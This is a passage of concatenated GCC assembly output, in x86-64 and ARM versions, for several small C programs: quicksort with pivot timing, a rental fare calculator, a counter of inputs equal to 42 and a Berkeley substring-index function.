#1 str r3, [fp, #-12] .L8: ldr r2, [fp, #-12] ldr r3, [fp, #-32] cmp r2, r3 ble .L10 ldr r3, [fp, #-16] add r3, r3, #1 lsl r3, r3, #2 ldr r2, [fp, #-24] add r0, r2, r3 ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 mov r1, r3 bl swap ldr r3, [fp, #-16] add r3, r3, #1 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size partition, .-partition .align 2 .global qs_last .syntax unified .arm .fpu softvfp .type qs_last, %function qs_last: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] ldr r2, [fp, #-20] ldr r3, [fp, #-24] cmp r2, r3 bge .L13 ldr r2, [fp, #-24] ldr r1, [fp, #-20] ldr r0, [fp, #-16] bl partition str r0, [fp, #-8] ldr r3, [fp, #-8] sub r3, r3, #1 mov r2, r3 ldr r1, [fp, #-20] ldr r0, [fp, #-16] bl qs_last ldr r3, [fp, #-8] add r3, r3, #1 ldr r2, [fp, #-24] mov r1, r3 ldr r0, [fp, #-16] bl qs_last .L13: nop mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size qs_last, .-qs_last .align 2 .global qs_mid .syntax unified .arm .fpu softvfp .type qs_mid, %function qs_mid: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-24] str r1, [fp, #-28] str r2, [fp, #-32] ldr r2, [fp, #-28] ldr r3, [fp, #-32] cmp r2, r3 bge .L23 ldr r3, [fp, #-28] str r3, [fp, #-16] ldr r3, [fp, #-32] str r3, [fp, #-12] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 lsr r2, r3, #31 add r3, r2, r3 asr r3, r3, #1 str r3, [fp, #-8] ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 ldr r3, [r3] str r3, [fp, #-8] b .L17 .L19: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L18: ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 ldr r3, [r3] ldr r2, [fp, #-8] cmp r2, r3 bgt .L19 b .L20 .L21: ldr r3, [fp, #-12] sub r3, r3, #1 str r3, [fp, #-12] .L20: ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 ldr r3, [r3] ldr r2, [fp, #-8] cmp r2, r3 blt .L21 ldr r2, [fp, #-16] ldr r3, [fp, #-12] cmp r2, r3 bgt .L17 ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-24] add r0, r2, r3 ldr r3, [fp, #-12] lsl r3, r3, #2 ldr r2, [fp, #-24] add r3, r2, r3 mov r1, r3 bl swap ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-12] sub r3, r3, #1 str r3, [fp, #-12] .L17: ldr r2, [fp, #-16] ldr r3, [fp, #-12] cmp r2, r3 ble .L18 ldr r3, [fp, #-16] sub r3, r3, #1 mov r2, r3 ldr r1, [fp, #-28] ldr r0, [fp, #-24] bl qs_mid ldr r2, [fp, #-32] ldr r1, [fp, #-16] ldr r0, [fp, #-24] bl qs_mid b .L14 .L23: nop .L14: sub sp, fp, #4 @ sp needed pop {fp, pc} .size qs_mid, .-qs_mid .section .rodata .align 2 .LC1: .ascii "Enter the number of elements: \000" .align 2 .LC2: .ascii "%d\000" .align 2 .LC3: .ascii "Unsorted array: \000" .global __aeabi_i2d .global __aeabi_ddiv .align 2 .LC4: .ascii "\012Sorted array with middle element as pivot: \000" .global __aeabi_dmul .align 2 .LC5: .ascii "\012It took %fms\000" .align 2 .LC6: .ascii "\012Sorted array with last element as pivot: \000" .align 2 .LC7: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #52 ldr r3, .L29 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, sp mov r4, r3 ldr r0, .L29+4 bl printf ldr r1, .L29+8 ldr r0, .L29+12 bl __isoc99_scanf ldr r3, .L29+8 ldr ip, [r3] sub r3, ip, #1 str r3, [fp, #-56] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-48] ldr r3, .L29+8 ldr ip, [r3] sub r3, ip, #1 str r3, [fp, #-44] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 mov r3, sp add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-40] ldr r0, .L29+16 bl printf mov r3, #0 str r3, [fp, #-52] b .L25 .L26: ldr r3, [fp, #-48] ldr r2, [fp, #-52] ldr r1, [fp, #-52] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-48] ldr r2, [fp, #-52] ldr r1, [r3, r2, lsl #2] ldr r3, [fp, #-40] ldr r2, [fp, #-52] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-52] add r3, r3, #1 str r3, [fp, #-52] .L25: ldr r3, .L29+8 ldr r3, [r3] ldr r2, [fp, #-52] cmp r2, r3 blt .L26 bl clock str r0, [fp, #-36] ldr r3, .L29+8 ldr r3, [r3] sub r3, r3, #1 mov r2, r3 mov r1, #0 ldr r0, [fp, #-48] bl qs_mid bl clock str r0, [fp, #-32] ldr r2, [fp, #-32] ldr r3, [fp, #-36] sub r3, r2, r3 mov r0, r3 bl __aeabi_i2d mov r2, #0 ldr r3, .L29+20 bl __aeabi_ddiv mov r2, r0 mov r3, r1 str r2, [fp, #-28] str r3, [fp, #-24] ldr r0, .L29+24 bl printf mov r2, #0 ldr r3, .L29+28 sub r1, fp, #28 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 ldr r0, .L29+32 bl printf bl clock str r0, [fp, #-36] ldr r3, .L29+8 ldr r3, [r3] sub r3, r3, #1 mov r2, r3 mov r1, #0 ldr r0, [fp, #-40] bl qs_last bl clock str r0, [fp, #-32] ldr r2, [fp, #-32] ldr r3, [fp, #-36] sub r3, r2, r3 mov r0, r3 bl __aeabi_i2d mov r2, #0 ldr r3, .L29+20 bl __aeabi_ddiv mov r2, r0 mov r3, r1 str r2, [fp, #-28] str r3, [fp, #-24] ldr r0, .L29+36 bl printf mov r2, #0 ldr r3, .L29+28 sub r1, fp, #28 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 ldr r0, .L29+32 bl printf mov sp, r4 mov r3, #0 ldr r2, .L29 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L28 bl __stack_chk_fail .L28: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L30: .align 2 .L29: .word .LC7 .word .LC1 .word n .word .LC2 .word .LC3 .word 1093567616 .word .LC4 .word 1083129856 .word .LC5 .word .LC6 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "629362.c" .intel_syntax noprefix .text .section .rodata .align 8 .LC0: .string "Enter the distance travelled by the vehicle : " .LC1: .string "%f" .align 8 .LC4: .string "Amount paid to the rented vehicle is %.1f" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT movss xmm1, DWORD PTR -16[rbp] movss xmm0, DWORD PTR .LC2[rip] comiss xmm0, xmm1 jb .L8 movss xmm1, DWORD PTR -16[rbp] movss xmm0, DWORD PTR .LC3[rip] mulss xmm0, xmm1 movss DWORD PTR -12[rbp], xmm0 pxor xmm3, xmm3 cvtss2sd xmm3, DWORD PTR -12[rbp] movq rax, xmm3 movq xmm0, rax lea rdi, .LC4[rip] mov eax, 1 call printf@PLT jmp .L4 .L8: movss xmm0, DWORD PTR -16[rbp] movss xmm2, DWORD PTR .LC2[rip] movaps xmm1, xmm0 subss xmm1, xmm2 movss xmm0, DWORD PTR .LC5[rip] mulss xmm1, xmm0 movss xmm0, DWORD PTR .LC6[rip] addss xmm0, xmm1 movss DWORD PTR -12[rbp], xmm0 pxor xmm4, xmm4 cvtss2sd xmm4, DWORD PTR -12[rbp] movq rax, xmm4 movq xmm0, rax lea rdi, .LC4[rip] mov eax, 1 call printf@PLT .L4: mov eax, 0 mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L6 call __stack_chk_fail@PLT .L6: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .section .rodata .align 4 .LC2: .long 1106247680 .align 4 .LC3: .long 1112014848 .align 4 .LC5: .long 1109393408 .align 4 .LC6: .long 1153138688 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "629362.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the distance travelled by the vehicle : \000" .align 2 .LC1: .ascii "%f\000" .global __aeabi_fcmple .global __aeabi_fmul .global __aeabi_f2d .align 2 .LC2: .ascii "Amount paid to the rented vehicle is %.1f\000" .global __aeabi_fsub .global __aeabi_fadd .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L9 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r0, .L9+4 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L9+8 bl __isoc99_scanf ldr r3, [fp, #-16] @ float ldr r1, .L9+12 mov r0, r3 bl __aeabi_fcmple mov r3, r0 cmp r3, #0 beq .L8 ldr r3, [fp, #-16] @ float ldr r1, .L9+16 mov r0, r3 bl __aeabi_fmul mov r3, r0 str r3, [fp, #-12] @ float ldr r0, [fp, #-12] @ float bl __aeabi_f2d mov r2, r0 mov r3, r1 ldr r0, .L9+20 bl printf b .L4 .L8: ldr r3, [fp, #-16] @ float ldr r1, .L9+12 mov r0, r3 bl __aeabi_fsub mov r3, r0 ldr r1, .L9+24 mov r0, r3 bl __aeabi_fmul mov r3, r0 ldr r1, .L9+28 mov r0, r3 bl __aeabi_fadd mov r3, r0 str r3, [fp, #-12] @ float ldr r0, [fp, #-12] @ float bl __aeabi_f2d mov r2, r0 mov r3, r1 ldr r0, .L9+20 bl printf .L4: mov r3, #0 ldr r2, .L9 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L6 bl __stack_chk_fail .L6: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word .LC3 .word .LC0 .word .LC1 .word 1106247680 .word 1112014848 .word .LC2 .word 1109393408 .word 1153138688 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "222752.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "222752.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "124871.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -16[rbp], 0 lea rax, -24[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov DWORD PTR -12[rbp], 0 jmp .L2 .L4: lea rax, -20[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -20[rbp] cmp eax, 42 jne .L3 add DWORD PTR -16[rbp], 1 .L3: add DWORD PTR -12[rbp], 1 .L2: mov eax, DWORD PTR -24[rbp] cmp DWORD PTR -12[rbp], eax jl .L4 mov eax, DWORD PTR -16[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L6 call __stack_chk_fail@PLT .L6: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "124871.c" .text .section .rodata .align 2 .LC0: .ascii "%d\012\000" .align 2 .LC1: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 ldr r3, .L7 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-16] sub r3, fp, #24 mov r1, r3 ldr r0, .L7+4 bl __isoc99_scanf mov r3, #0 str r3, [fp, #-12] b .L2 .L4: sub r3, fp, #20 mov r1, r3 ldr r0, .L7+4 bl __isoc99_scanf ldr r3, [fp, #-20] cmp r3, #42 bne .L3 ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] .L3: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L2: ldr r3, [fp, #-24] ldr r2, [fp, #-12] cmp r2, r3 blt .L4 ldr r1, [fp, #-16] ldr r0, .L7+4 bl printf mov r3, #0 ldr r2, .L7 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L6 bl __stack_chk_fail .L6: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L8: .align 2 .L7: .word .LC1 .word .LC0 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "969718.c" .intel_syntax noprefix .text .data .align 32 .type sccsid, @object .size sccsid, 37 sccsid: .string "@(#)h_indx.c\t5.2 (Berkeley) 04/12/91" .text .globl h_indx .type h_indx, @function h_indx: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov QWORD PTR -56[rbp], rdx mov QWORD PTR -64[rbp], rcx mov rax, QWORD PTR -56[rbp] mov edx, eax mov rax, QWORD PTR -64[rbp] mov ecx, eax mov eax, edx sub eax, ecx add eax, 1 mov DWORD PTR -28[rbp], eax mov rdx, QWORD PTR -64[rbp] mov rax, QWORD PTR -48[rbp] add rax, rdx mov QWORD PTR -8[rbp], rax mov DWORD PTR -32[rbp], 0 jmp .L2 .L7: mov eax, DWORD PTR -32[rbp] movsx rdx, eax mov rax, QWORD PTR -40[rbp] add rax, rdx mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -48[rbp] mov QWORD PTR -16[rbp], rax jmp .L3 .L5: mov rax, QWORD PTR -24[rbp] lea rdx, 1[rax] mov QWORD PTR -24[rbp], rdx movzx ecx, BYTE PTR [rax] mov rax, QWORD PTR -16[rbp] lea rdx, 1[rax] mov QWORD PTR -16[rbp], rdx movzx eax, BYTE PTR [rax] cmp cl, al jne .L9 .L3: mov rax, QWORD PTR -16[rbp] cmp rax, QWORD PTR -8[rbp] jb .L5 mov eax, DWORD PTR -32[rbp] add eax, 1 jmp .L6 .L9: nop .L4: add DWORD PTR -32[rbp], 1 .L2: mov eax, DWORD PTR -32[rbp] cmp eax, DWORD PTR -28[rbp] jl .L7 mov eax, 0 .L6: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size h_indx, .-h_indx .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "969718.c" .text .data .align 2 .type sccsid, %object .size sccsid, 37 sccsid: .ascii "@(#)h_indx.c\0115.2 (Berkeley) 04/12/91\000" .text .align 2 .global h_indx .syntax unified .arm .fpu softvfp .type h_indx, %function h_indx: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #44 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] str r3, [fp, #-44] ldr r2, [fp, #-40] ldr r3, [fp, #-44] sub r3, r2, r3 add r3, r3, #1 str r3, [fp, #-12] ldr r3, [fp, #-44] ldr r2, [fp, #-36] add r3, r2, r3 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-24] b .L2 .L7: ldr r3, [fp, #-24] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-36] str r3, [fp, #-16] b .L3 .L5: ldr r3, [fp, #-20] add r2, r3, #1 str r2, [fp, #-20] ldrb r2, [r3] @ zero_extendqisi2 ldr r3, [fp, #-16] add r1, r3, #1 str r1, [fp, #-16] ldrb r3, [r3] @ zero_extendqisi2 cmp r2, r3 bne .L9 .L3: ldr r2, [fp, #-16] ldr r3, [fp, #-8] cmp r2, r3 bcc .L5 ldr r3, [fp, #-24] lsl r3, r3, #16 lsr r3, r3, #16 add r3, r3, #1 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #16 asr r3, r3, #16 b .L6 .L9: nop .L4: ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L2: ldr r2, [fp, #-24] ldr r3, [fp, #-12] cmp r2, r3 blt .L7 mov r3, #0 .L6: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size h_indx, .-h_indx .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits